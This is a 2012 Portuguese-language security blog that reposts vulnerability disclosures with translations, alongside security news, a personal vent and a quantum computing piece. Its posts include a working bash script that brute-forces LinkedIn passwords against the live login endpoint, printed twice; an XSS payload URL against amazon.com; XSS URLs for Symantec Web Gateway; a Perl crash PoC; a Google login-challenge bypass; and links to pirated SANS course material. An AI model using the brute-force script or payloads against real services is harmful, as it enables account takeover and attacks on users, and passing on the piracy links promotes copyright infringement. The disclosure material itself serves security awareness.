Páginas

quarta-feira, 30 de maio de 2012

Artigos Novos!!


Artigos Novos Chegando!!!

Olá pessoal, visitantes do blog ‘LoucoporSec’, por esses dias(sou ruim de datas) recebi uma crítica super construtiva que me fez reavaliar o modo de como eu estava guiando o blog, essa pessoa me falou(sou ruim pra nomes também) que seria interessante eu começar a escrever meus próprios artigos integralmente, dito isso, agradeci e que achei bacana a luz que a pessoa me deu.
Fonte: Google

Venho comunicar que estou tirando algumas bases de alguns documentos que possuo na minha máquina, sendo os assuntos serão de: 
"XSS, Como funciona? Como testar?";"0day Exploits.Como identificar vulnerabilidades?";

Eis a questão que será pensada por muitos nas suas cabeças.Mas Raphael, porque você já não coloca esses artigos no blog?
Bom eu possuo o tempo para escrever artigos de no máximo: 1h,(só?)É complicado, porque eu não quero fazer as coisas de qualquer jeito, então prefiro não apressar.
Esse tempo será aumentado consideravelmente ao término dessa semana (provas).
Peço também para que deixem temas que fossem legais de serem abordados.

Obs: Não me esqueci do curso da Sans, o link do Torrent há poucos Seeder’s peço paciência.

Um abraço.

Raphael Pagliuca

sábado, 26 de maio de 2012

Behind The Scenes - Rodrigo Rubira Branco

Há algum tempo atrás um colega, me enviou um video do Rodrigo Rubira Branco, do qual o assunto era por trás das câmeras, o que acontece realmente quando algum pesquisador descobre a falha sobre algum produto e relata, eu achei muito interessante, resolvi compartilhar esse video:





Um Abraço!

Raphael Pagliuca

Como rastrear pessoas usando Mídias Socias?

Bom galera, estava vasculhando alguns sites para ver qual post eu iria colocar agora aqui no site, e tive a ideia de diversificar um pouco as coisas, decidi recomendar um vídeo para vocês assistirem.Cujo assunto é de como rastrear as pessoas usando mídias sociais, esse é um assunto que eu gosto, pelo seguinte motivo, não era tão fácil encontrar pessoas procurando em listas telefônicas, hoje em dia, podemos encontrar simplesmente, digitando no Google: "Fulano de Tal da Silva".

Segue abaixo vídeo da Palestra :"Palestra How to tracking people using social media sites- Thiago Bordini - Workshop SegInfo 2011"



Um abraço a TODOS  os meus leitores.


Raphael Pagliuca



quinta-feira, 24 de maio de 2012

[WowEBook] Curso Sans: Network Penetration Testing and Ethical Hacking(version 0308)

Caros amigos, estava vasculhando a aba de Security do site: wowebook.net, quando me deparei com o seguinte título: " Sans: Network Penetration Testing and Ethical Hacking(version 0308)", despertou minha atenção cliquei, é um curso da Sans sobre Pentest e EHC, pra quem não sabe hoje a Sans é referência em treinamentos na área.Fiquei feliz ao ver isso, mas fiquei intrigado, fui ver quanto custa para fazer esse curso, eis a tabela simplória:


*Description*Fee
*Course Fee*$4,370.00
*Additional for Certification*$549.00
*Additional for OnDemand*$449.00


Quase saltei da cadeira quando vi o valor, ou seja colegas, baixem e aproveitem esse conhecimento, e vamos compartilhar isso para que haja mais pessoas com esse conhecimento que o curso dá.


Obs: *Usei como base, a tabela de curso via web.

Correção:

Através de um comunicado, foi constatado que os links eram iniviáveis de serem utilizados já que era somente para usuário premium, consegui um outro link direto:


http://flmsdown.net/ebooks/1171694-sans-security-560-gpen-network-penetration-testing-and-ethical-hacking-repost.html

Link Demonoid:

http://www.demonoid.ph/files/details/2766481/5817189/


Abraços.

Windows Local Privilege Escalation (Vulnerabilidade)

Mais uma vulnerabilidade encontrada( sério?! ).

Microsoft Windows is prone to a local privilege-escalation vulnerability. 

An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers or cause denial of service conditions. 

Windows XP SP3 with win32k.sys 5.1.2600.6206 is vulnerable.



Tradução:

Microsoft Windows é propenso a uma vulnerabilidade de escalonamento de privilégios local.

Um atacante pode explorar esta questão para executar código arbitrário com privilégios de sistema. A exploração com êxito deste problema irá resultar no comprometimento completa de computadores afetados ou causar negação de condições de serviço.

Windows XP SP3 com win32k.sys 5.1.2600.6206 é vulnerável.


Sabem, que hoje não me assustam essas vulnerabilidades, já que é "PADRÃO" Microsoft fazer isso.

Abraços!

quarta-feira, 23 de maio de 2012

RDP Exploit Win Seven em Win 2008

Bom senhores, não ando muito pesquisando sobre as coisas, porque me ocorre o seguinte problema: Época de Provas na Faculdade, tenho me dedicado um tempo menor ao blog, mais prometo que semana que vem retornarei com tudo, falando nisso estou traduzindo um material de como funciona e como se faz o Cross Site Scripting e com isso encontrei um paper muito bom sobre uma falha do RDP, está em inglês, espero traduzir logo para vocês em português, já que estou meio que sem tempo ultimamente hehehe, bom segue o link do paper: http://dl.packetstormsecurity.net/papers/win/RDP_exploit.pdf

Abraços!

Windows XP 0day Layout de Teclado


Windows XP keyboard layouts pool corruption 0day PoC, post-MS12-034.

    Vulnerability exists in the function win32k!ReadLayoutFile(), that parses
    keyboard layout files data. Possible attack vector -- local privileges
    escalation.

    Similar vuln (CVE-2012-0183) was patched recently, but I wonder, that
    Microsoft missed to rewrite vulnerable code on Windows XP, and this PoC
    still able to crash fully-patched XP SP3.
   
    However, pool corruption is not fully-controllable, and reliable code execution
    exploit development is quite a difficult task.

    --------------------------------

    By Oleksiuk Dmytro (aka Cr4sh)
   
    http://twitter.com/d_olex
    http://blog.cr4.sh
    mailto:dmitry@esagelab.com

    --------------------------------

    Typical bugcheck:
   *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: e10650d3, memory referenced.
    Arg2: 00000000, value 0 = read operation, 1 = write operation.
    Arg3: bf881fb6, If non-zero, the instruction address which referenced the bad memory
    address.
    Arg4: 00000001, (reserved)

    Debugging Details:
    ------------------


    READ_ADDRESS:  e10650d3 Paged pool

    FAULTING_IP:
    win32k!ReadLayoutFile+183
    bf881fb6 803800          cmp     byte ptr [eax],0

    MM_INTERNAL_CODE:  1

    IMAGE_NAME:  win32k.sys

    DEBUG_FLR_IMAGE_TIMESTAMP:  4f85831a

    MODULE_NAME: win32k

    FAULTING_MODULE: bf800000 win32k

    DEFAULT_BUCKET_ID:  DRIVER_FAULT

    BUGCHECK_STR:  0x50

    PROCESS_NAME:  win32k_Keyboard

    TRAP_FRAME:  b191c884 -- (.trap 0xffffffffb191c884)
    ErrCode = 00000000
    eax=e10650d3 ebx=e105b008 ecx=e105b008 edx=00000000 esi=e106ac08 edi=e105c008
    eip=bf881fb6 esp=b191c8f8 ebp=b191c90c iopl=0         nv up ei ng nz na po nc
    cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010282
    win32k!ReadLayoutFile+0x183:
    bf881fb6 803800          cmp     byte ptr [eax],0           ds:0023:e10650d3=??
    Resetting default scope

    LAST_CONTROL_TRANSFER:  from 804f7b8b to 80527c24

    STACK_TEXT:
    b191c3c0 804f7b8b 00000003 e10650d3 00000000 nt!RtlpBreakWithStatusInstruction
    b191c40c 804f8778 00000003 00000000 c0708328 nt!KiBugCheckDebugBreak+0x19
    b191c7ec 804f8ca3 00000050 e10650d3 00000000 nt!KeBugCheck2+0x574
    b191c80c 8051cc4f 00000050 e10650d3 00000000 nt!KeBugCheckEx+0x1b
    b191c86c 805405f4 00000000 e10650d3 00000000 nt!MmAccessFault+0x8e7
    b191c86c bf881fb6 00000000 e10650d3 00000000 nt!KiTrap0E+0xcc
    b191c90c bf881e25 e208f8e8 e10611c8 e105c008 win32k!ReadLayoutFile+0x183
    b191c92c bf8b9574 800003a4 00000000 00000000 win32k!LoadKeyboardLayoutFile+0x6a
    b191c9b4 bf92a002 82273e08 800003a4 04090409 win32k!xxxLoadKeyboardLayoutEx+0x1b1
    b191c9f0 bf8b91b5 82273e08 0000003c 04090409 win32k!xxxSafeLoadKeyboardLayoutEx+0xa9
    b191cd40 8053d6f8 0000003c 00000000 0012fec8 win32k!NtUserLoadKeyboardLayoutEx+0x164
    b191cd40 004011c4 0000003c 00000000 0012fec8 nt!KiFastCallEntry+0xf8
    0012ff7c 004015de 00000001 00363c48 00362e80 win32k_KeyboardLayout_expl!NtUserLoadKeyboardLayoutEx+0x14 [x:\dev\_exploits\_local\win32k_keyboardlayout_expl\win32k_keyboardlayout_expl\win32k_keyboardlayout_expl.cpp @ 37]
    0012ffc0 7c817077 00330036 00360038 7ffdd000 win32k_KeyboardLayout_expl!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 586]
    0012fff0 00000000 00401726 00000000 78746341 kernel32!BaseProcessStart+0x23


    STACK_COMMAND:  kb

    FOLLOWUP_IP:
    win32k!ReadLayoutFile+183
    bf881fb6 803800          cmp     byte ptr [eax],0

    SYMBOL_STACK_INDEX:  6

    SYMBOL_NAME:  win32k!ReadLayoutFile+183

    FOLLOWUP_NAME:  MachineOwner

    FAILURE_BUCKET_ID:  0x50_win32k!ReadLayoutFile+183

    BUCKET_ID:  0x50_win32k!ReadLayoutFile+183

    Followup: MachineOwner
    ---------

===
POC
===

http://www.exploit-db.com/sploits/18894.zip

Fonte: http://www.exploit-db.com/exploits/18894/


Tradução:


O layouts de teclado do Windows XP gera corrupção conjunta, 0day PoC, pós-MS12-034.

     Vulnerabilidade existe na função win32k! ReadLayoutFile (), que analisa
     arquivos de dados do layout do teclado. Possível vetor de ataque - privilégios locais
     escalados.

     Vuln Similar (CVE-2012-0183) foi corrigida recentemente, mas eu me pergunto,o que
     Microsoft perdeu a reescrever o código vulnerável no Windows XP, e isso PoC
     ainda capaz de travar totalmente atualizado XP SP3.
   
     Contudo, a corrupção conjunta não é totalmente controlável, e execução de código confiável
     explorar o desenvolvimento é uma tarefa bastante difícil.
Preferi traduzir somente o que "interessa ao primeiro momento já que copiar e colar o código acima só irá deixar maior o artigo.

Abraços!




domingo, 20 de maio de 2012

Desabafo de Um Iniciante




É parceiro, o tempo tá passando e eu estou me sentindo estagnado, sem opções á frente para seguir no meu alcance, bom posso dizer que existe opções(contraditório) só que não no meu local de atuação hoje, já que não quero largar tudo denovo, pelo menos por enquanto, espero sim coisas melhores, planos que eu tinha de concretizar até a metade do ano, já não são mais realidade, já que pensei que as coisas seriam mais rápidas, ou eu que estou ficando exigente pra isso?
Muito me vêem como tímido a primeiro momento, só porque eu prefiro me reservar a primeiro encontro, já que eu não gosto de expor grandezas e fraquezas num primeiro contato, talvez eu seja persistente de teimar que vai dar certo, já que ainda estou aqui né, ou sou muito teimoso, que vejo que não tenho perspectiva de melhorar e continuar.
Ás vezes penso comigo, em abandonar e deixar, assim correr atrás de algo que me dê o valor e reconhecimento que preciso, já que não vejo mais isso, sabe aquele: "Muito Obrigado!", "Você é demais!", motivam as pessoas, por isso procuro fazer isso com pessoas que se esforçam, agora não adianta não se esforçar e querer isso.
Também faço o questionamento, será que é assim mesmo no começo?Fiz aquilo pra fazer tal coisa que foge completamente da minha ideia?O que aconteceria se eu fosse embora hoje?Sentiriam algo?
Pode ser que ás vezes eu reclamo demais, mas eu quero crescer, mostrar o porque sou bom, mostrar que eu posso fazer mais coisas, mas o sentimento quando não tem o "Q" para instigar a dar o melhor, sim penso que no começo era alucinado, hoje relembro tudo isso e sinto a falta dessa chama que estava acesa, com o medo de ela se apagar completamente e eu virar um simples humano sem sentimento e frio.Percebo em algumas de minhas ações esses sentimentos, ou seja, sem sentimento, me deparei outro dia tomando ações que nunca pensei que iria tomar, bom foi um desabafo.

Bola pra frente que a semana irá ser longa e preciso de ânimo para estudar.


Boa Noite a todos.

Symantec Web Gateway 'l' Parâmetro de Cross Site Scripting



Symantec Web Gateway is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.


Fonte:http://www.securityfocus.com/bid/53396/discuss

Tradução e adaptação:


Symantec Web Gateway está propenso a uma vulnerabilidade de XSS porque falhou ao sanar adequadamente a entrada user-supplied. Um atacante pode aproveitar esta questão para executar o código de script arbitrário no navegador de um usuário dessa forma comprometendo sem vestígios o site afetado. Isso pode permitir que o invasor roubar credenciais de autenticação baseadas em cookies e lançar outros ataques.


 Exemplos:


http://www.example.com/spywall/timer.php?d=4099&l=22665'<img src="myimage.jpg">&profile=40 

http://www.example.com/spywall/timer.php?d=4099&l=<img src="myimage.jpg">&profile=40

sexta-feira, 18 de maio de 2012

LinkedIn Brute Force


                            Fonte: Google

LinkedIn uses a Token into the login form which can be used many times
for different usernames. You can do it using the same IP or differents
IP, the token will not be verified.



I. Step by step
===============
1). Login into your LinkedIn account and capture the "sourceAlias" and
"csrfToken" variable (example:
sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)

2). Use the Token to login into another account:
https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody () somedomain 
com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless

session_key is the username and session_password is the password.

3). The password (session_password) is not correct If the requested URL
returns "The email address or password you provided does not match our
records", else the password if correct.



II. PoC
=======

1). The Wordlist (filename: w)
[zerial () belcebu ~]$ cat w
asdfgh
zxcvbnm
1234567
0987654
12345698
456_4567
123456qwert
qwsdcv
12wedfgh
123456qwerty
12345qwei
112233
[zerial () belcebu ~]$


2). Executing the script:
[zerial () belcebu ~]$ sh linkedin.sh panic () zerial org w
Password found: qwsdcv
[zerial () belcebu ~]$

This is the correct password for this test user.




III. Script
===========

#!/bin/bash
#
# usage: ./linkedin.sh username () domain com wordlist
#

TOKEN="ajax%3A6265303044444817496"
sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"

if [ ! -f $2 ];
then
        echo "file $2 does not exists"
        exit
fi

_USR=$1
for _PWD in $(cat $2);
do
        if [ $(echo -n $_PWD|wc -c) -lt 6 ];
        then
                echo "Ignoring $_PWD (must be grather than 6 chars)"; continue
        fi
        wget -o /dev/null -O -
"https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless";|grep
'The email address or password you provided does not match our
records\|captcha' >>/dev/null
        if [ $? -eq 1 ];
        then
                echo "Password found: $_PWD"; exit;
        fi
done

echo "Password NOT found. Try later."
#EOF


Tradução:

LinkedIn usa um Token dentro da área de login, que pode ser usado de diversas vezes com usuários diferentes.Você consegue fazer isso com o mesmo IP ou diferentes IP's, o Token não será verificado.

I. Passo a Passo.
===============
1).Entre em sua conta LinkedIn e faça a captura do "sourceAlias" e "csrfToken" variável
 (exemplo:
sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)

2).Use o Token de login em outra conta:
https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody () somedomain 
com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless

session_key is the username and session_password is the password.

3). A senha (session_password) não é a correta se a URL retornar assim:"The email address or password you provided does not match our records", se a senha estiver correta.



II. PoC
=======

1). The Wordlist (filename: w)
[zerial () belcebu ~]$ cat w
asdfgh
zxcvbnm
1234567
0987654
12345698
456_4567
123456qwert
qwsdcv
12wedfgh
123456qwerty
12345qwei
112233
[zerial () belcebu ~]$


2). Executing the script:
[zerial () belcebu ~]$ sh linkedin.sh panic () zerial org w
Password found: qwsdcv
[zerial () belcebu ~]$

Esse é a senha correta para esse teste.




III. Script
===========

#!/bin/bash
#
# usage: ./linkedin.sh username () domain com wordlist
#

TOKEN="ajax%3A6265303044444817496"
sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"

if [ ! -f $2 ];
then
        echo "file $2 does not exists"
        exit
fi

_USR=$1
for _PWD in $(cat $2);
do
        if [ $(echo -n $_PWD|wc -c) -lt 6 ];
        then
                echo "Ignoring $_PWD (must be grather than 6 chars)"; continue
        fi
        wget -o /dev/null -O -
"https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless";|grep
'The email address or password you provided does not match our
records\|captcha' >>/dev/null
        if [ $? -eq 1 ];
        then
                echo "Password found: $_PWD"; exit;
        fi
done

echo "Password NOT found. Try later."
#EOF

Fonte: http://seclists.org/fulldisclosure/2012/May/184

quinta-feira, 17 de maio de 2012

"Hackerazzi" da Carolina Dieckmann

Bom senhores, como todos nós em meio tempos de ataques de DDoS, hacking de senhas de deputados e vereadores de e-mails trocando "gentilezas", por fim muito protesto em ruas que pessoas saem com máscaras, nos deparamos com o seguinte acontecimento:

"A atriz Carolina Dieckmann foi chantageada por e-mail um mês antes da divulgação das fotografias íntimas na Internet. Em algumas cenas, ela aparece completamente nua. Uma das suspeitas é que as imagens possam ter sido retiradas de seu computador portátil por um técnico de informática que consertou a máquina há cerca de dois meses"
Fonte:http://hdadvance.blogspot.com.br/2012/05/atriz-carolina-carolina-dieckmann_07.html

Ok, todos nós temos fotos nossas peladas no computador, isso é super normal guardar....tá não vem ao caso isso, o que me deixou perplexo foi o conjunto da obra armado ( como um colega meu fala: "Pra mim isso é fumaça", ou seja, desnecessário). Foi passado nos telejornais como se tivessem roubado um banco super seguro.
Aí eu estava vendo meus feeds de notícias quando eu vejo que o Anchises atualizou o blog dele com o seguinte texto:

"O sensacional colega e blogueiro Sandro Suffert escreveu um excelente artigo comentando o caso da divulgação das fotos íntimas da atriz Carolina Dieckmann. Além de opinar sobre o caso, o Sandro juntou vários trechos de reportagens sobre a história para conseguir montar o quebra-cabeça e finalmente detalhar como aconteceu a invasão e o roubo das fotos. 
Para quem se interessa pelo caso, o artigo do Sandro é uma ótima referência. Mas uma coisa que me chamou a atenção foi que ele usou o termo "Hackerazzi" para se referir a este incidente. "

Comecei a ler e eu concordo com o autor do texto sobre o que foi escrito, e acrescento gostei muito da explicação que ele deu.

Bom aqui está o link se você se interessar como foram descobertos os autores da "invasão"  de privacidade(?) da atriz GLOBAL Carolina Dickmann.


Um Abraço!!

The Pirate Bay é atacado por DDoS


The Pirate Bay é Atacado por DDoS

The site has been largely inaccessible for the last 24 hours, and the service is intermittent in the UK.

The Pirate Bay has confirmed the attack on its Facebook page, saying that it did not know who was behind it, although it "had its suspicions".

A provider of DDoS defence systems said that it was unlikely that the attack came from hacking group Anonymous.

"There will be further attacks, but what's significant about this whole story is that people think that it is the Anonymous attacking a site which is typically a type of site that they defend," said Andre Stewart of Corero Network Security.

"It could be the record labels, or a government somewhere that has had enough of not being able to catch The Pirate Bay, it could be just one person who had rented some cloud power from Amazon and is sitting in a cafe, and is able to launch an attack."

Don't freak out. You'll get your TPB fix tomorrow”

The Pirate Bay
Although some users may have attempted to access the site using proxies, TPB itself warned them against doing so.

Illegal file sharing
"Use proxies at own risk. Don't login unless you trust the proxy supplier. Don't freak out. You'll get your TPB fix tomorrow," said the site.

Being an illegal file-sharing site, TPB allows users to obtain songs, films and other content free, thus angering copyright holders who end up losing money.


Virgin Media users trying to access The Pirate Bay are shown a message explaining why it is blocked
"If they're losing money and seeing that the government is not being able to stop it, there's a real monetary value reason for them to try and bring it down," said Mr Stewart.

"And if they can do it in the name of Anonymous then it's great for them.

"Equally the governments that protect these industries are frustrated as well because they haven't been able to see it close down, unlike a number of other torrent sites."

Open and free
Virgin Media began preventing access to the file-sharing site following a High Court order last week.

Governments could be frustrated because they haven't been able to see TPB close down”


Twitter feeds associated with the Anonymous collective wrote: "Virgin Media - Tango Down #OpTPB".

But TPB criticised Anonymous for the attack, writing on its Facebook page that it did not "encourage these actions".

"We believe in the open and free internets, where anyone can express their views," wrote TPB.

"Even if we strongly disagree with them and even if they hate us. So don't fight them using their ugly methods. DDoS and blocks are both forms of censorship."

Fonte:http://packetstormsecurity.org/news/view/20997/The-Pirate-Bay-Hit-By-Denial-Of-Service-Attack.html

Tradução:


O local tem sido largamente inacessível durante as últimas 24 horas, e o serviço está intermitente no Reino Unido.

The Pirate Bay confirmou o ataque em sua página no Facebook, dizendo que não sabia quem estava por trás dele, embora ele "teve suas suspeitas".

A fornecedora de sistemas de DDoS defesa disse que era improvável que o ataque veio de grupo de hackers Anonymous.

"Haverá mais ataques, mas o que é significativo sobre essa história toda é que as pessoas pensam que ele é o Anônimo atacar um site que normalmente é um tipo de site que eles defendem", disse Andre Stewart Corero de Segurança de Rede.

"Pode ser que as gravadoras, ou um governo em algum lugar que já teve o suficiente de não ser capaz de capturar o The Pirate Bay, que poderia ser apenas uma pessoa que tinha alugado algum poder nuvem da Amazon e está sentado em um café, e é capaz para lançar um ataque. "

Embora alguns usuários podem ter tentado acessar o site usando proxies, TPB-se os advertiu contra isso.

Compartilhamento ilegal de arquivos
"Usar proxies por conta e risco. Não entre a menos que você confiar no fornecedor proxy. Não surtar. Você terá a sua correção TPB amanhã", disse o site.

Sendo um site de partilha de ficheiros ilegais, TPB permite aos usuários obter músicas, filmes e outros conteúdos livres, assim irritando os detentores de copyright que acabam perdendo dinheiro.


Usuários da Virgin Media que tentam acessar o The Pirate Bay é mostrada uma mensagem explicando por que ele está bloqueado
"Se eles estão perdendo dinheiro e vendo que o governo não está sendo capaz de pará-lo, há uma razão real valor monetário para eles para tentar derrubá-lo", disse Stewart.

"E se eles podem fazê-lo em nome de Anônimo, em seguida, é ótimo para eles.

"Igualmente os governos que protegem essas indústrias estão frustrados, mas também porque eles não foram capazes de vê-lo fechar, ao contrário de uma série de outros sites de torrent."

Aberto e livre
Virgin Media começou a impedir o acesso ao site de compartilhamento de arquivos na sequência de uma ordem do Tribunal de alta na semana passada.

Os governos poderiam ser frustrados porque não têm sido capazes de ver TPB fechar "

Algum tempo depois, a Virgem site Mídia sofreu um ataque de hack que muitos pensavam que foi organizada para protestar contra os esforços para bloquear o acesso ao TPB.

Twitter alimenta associado com o coletivo anônimo escreveu: "Virgin Media - Tango Down # OpTPB".

Mas TPB criticou anônimo para o ataque, escrevendo em sua página de Facebook que não "incentivar estas ações".

"Acreditamos nas internets aberto e livre, onde qualquer um pode expressar suas opiniões", escreveu o TPB.

"Mesmo se discordamos fortemente com eles e mesmo que eles nos odeiam. Portanto, não combatê-los usando seus métodos feias. DDoS e blocos são as duas formas de censura."


Matéria um pouco duvidosa, já que os "mocinhos" como se intitulam do Anonymous, defendem a liberdade de expressão, como eles estaria atrás dos ataques?Bipolaridade?Pressão?Acordos Governamentais?
Isso iremos saber mais para frente com o desenrolar da história.

terça-feira, 15 de maio de 2012

Denial Of Service no Universal Reader


Title: Universal Reader Filename Denial Of Service Vulnerability
Software : Universal Reader

Software Version : 1.16.740.0 (product version: 0.63.538)

Vendor: http://uread.superfection.com/ 

Vulnerability Published : 2012-05-12

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Universal Reader is a online/offline reader for reading polytype e-book files.
Universal Reader contains any denial of service vulnerability about openning long-name files. Success in exploiting this vulnerability will crumble uread.exe process.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK


Fonte:http://packetstormsecurity.org/files/112676/universalreader-dos.txt

XSS no site da Amazon.com



Security researcher Lohit Tummalapenta, has submitted on 17/03/2012 a cross-site-scripting (XSS) vulnerability affecting www.amazon.com, which at the time of submission ranked 11 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/05/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 17/03/2012
Date published: 15/05/2012
Status:  UNFIXED
Author: Lohit Tummalapenta
Domain: www.amazon.com
Category: XSS
Pagerank: 11
URL: https://www.amazon.com/gp/aw/ya/181-1583093-7256013/%22%3E%3C/form%3E%3Cscript%3Ealert%28%27Lohit%20
Tummalapenta%27%29%3C/script%3E



Tradução:


O pesquisador de segurança Lohit Tummalapenta, apresentou em 17/03/2012 uma vulnerabilidade de cross-site-scripting (XSS), afetando o site  www.amazon.com, que no momento da apresenta a classificação  11 na web de acordo com a Alexa.
Nós manualmente validamos e publicamos um espelho dessa vulnerabilidade em 15/05/2012. Hoje é unfixed.
Se você acredita que este problema de segurança foi corrigido, por favor, envie-nos um e-mail.
Data de apresentação: 17/03/2012
Data de publicação:15/05/2012 
Status:  UNFIXED(Não Fixado)
Autor: Lohit Tummalapenta 
Domain: www.amazon.com
Categoria: XSS 
Pagerank: 11
URL: https://www.amazon.com/gp/aw/ya/181-1583093-7256013/%22%3E%3C/form%3E%3Cscript%3Ealert%28%27Lohit%20
Tummalapenta%27%29%3C/script%3E

Link do Mirror Aqui!


A cada dia mais descobrimos que serviços muitas vezes dados como seguros estão realmente muito vulneráveis.
Será que a Amazon irá efetuar da correção logo, ou irá migrar com ela em nosso País?

Abraço!

domingo, 13 de maio de 2012

Vulnerabilidade Contas Google

                                            Fonte: Google

Effective since May 1, 2012.
          Products Affected: All Google account based services
Upon attempting to log-in to my Google account while away from home, I was
presented with a message that required me to confirm various details about
my account in order to ensure I was a legitimate user and not just someone
who came across my username and password. Unable to remember what my phone
number from 2004 was, I looked for a way around it.
The questions presented to me were:
Complete the email address: a******g () gmail com
Complete the phone number: (425) 4**-***7
Since this was presented to me, I was certain I had my username and password
correct.
From there, I simply went to check my email via IMAP at the new location.
I was immediately granted access to my email inboxes with no trouble.
From there, I attempted to log-in to my Google account with the same
username and password.
To my surprise, I was not presented with any questions to confirm my
identity.
This completes the steps required to bypass this account hijacking
counter-measure.
This just goes to show that even the largest corporations that employ teams
of security experts, can also overlook very simple issues.
Fonte: SecurityFocus

Tradução:

Em vigor desde 01 de maio de 2012.           Produtos afetados: Todos os serviços baseados em conta do GoogleAo tentar iniciar sessão na minha conta do Google, enquanto longe de casa, foi apresentada uma mensagem que me pediu para confirmar vários detalhes sobreminha conta, a fim de garantir que eu era um usuário legítimo e não apenas alguém que veio em meu nome de usuário e senha. Incapaz de lembrar o que o meu telefone número de 2004 foi, eu procurei uma maneira de contornar isso.As questões apresentadas a mim foram:
Preencha o endereço de email: um ****** g () gmail comCompletar o número de telefone: (425) 4 ** - *** 7
         Uma vez que este foi apresentado a mim, eu tinha certeza que eu tinha meu nome de      usuário e senha corretos.
         De lá, eu simplesmente fui checar meu e-mail via IMAP no novo local.
Fui imediatamente acessar a caixas de entrada de e-mail sem problemas.De lá, tentei fazer o login na minha conta do Google com o mesmonome de usuário e senha.Para minha surpresa, não foi apresentado com todas as perguntas para confirmar a minhaidentidade.Isso conclui as etapas necessárias para contornar essa conta seqüestrocontra-medida.Isso só vai mostrar que mesmo as maiores corporações que empregam equipesde especialistas em segurança, também pode negligenciar questões muito simples.

Bom pelo relato acima, podemos concluir, que não adianta muito querermos pensar na forma mais difícil e mirabolante de hackear um conta, ás vezes as respostas estão nos jeitos simples de fazer que pode ser o cotidiano de cada um, e nem ao menos, perceber essa questão.

sábado, 12 de maio de 2012

Computação Quântica Perto da Realidade?

                                                                       Fonte: Google
Veio a minha cabeça, a seguinte questão - Como estão os estudos e os avanços na área da computação quântica?
Para falar a verdade, esse assunto sempre me fascinou, pela potência de precisão e desempenho que pode chegar, tanto para ajudar nos estudos sobre constelações, medicina, pesquisas e afins, tanto para usuários comuns.
A pergunta que veio pra mim na cabeça foi: Os S.O's serão programados do jeito que nós conhecemos?
Curioso como sou fui procurar na internet uma definição para vocês que nunca leram ou ouviram falar sobre essa tecnologia:
Computadores quânticos podem parecer ficção cientifica para muita gente, porém são mais reais do que se imagina. Em 1981, Paul Benioff unificou a computação  com as leis da mecânica quântica, criando uma nova área de pesquisa chamada computação quântica. De forma simples e direta, podemos dizer que a computação quântica é uma teoria que aplica propriedades quânticas como emaranhamento e superposição nos computadores e processadores, visando o aumento exponencial de desempenho dos mesmos.
As aplicações da mecânica quântica à computação são extraordinárias. A mais notável de todas as possibilidades é com certeza o avanço gigantesco na velocidade de processamentos dos computadores. O princípio básico da computação clássica é utilizar bits como unidade básica de informação. Os bits, dígitos binários, utilizam dois valores para o armazenamento de informações. Estes valores podem ser 0 e 1 (números binários), verdadeiro ou falso, entre outros. Isso quer dizer que os bits podem assumir um valor ou outro e isso restringe sua capacidade de processamento, já que de acordo com a física clássica só se pode ter um valor ou outro, nunca os dois ao mesmo tempo.
Em termos práticos, o que acontece é que os bits normalmente são fluxos elétricos. É programada uma voltagem padrão e se a voltagem for maior ou menor que a voltagem padrão programada o computador entenderá como 0 ou 1, por exemplo. Para que os computadores façam isso, é necessário haver um sistema para aumentar ou restringir o fluxo de eletricidade, o que gasta tempo e energia.



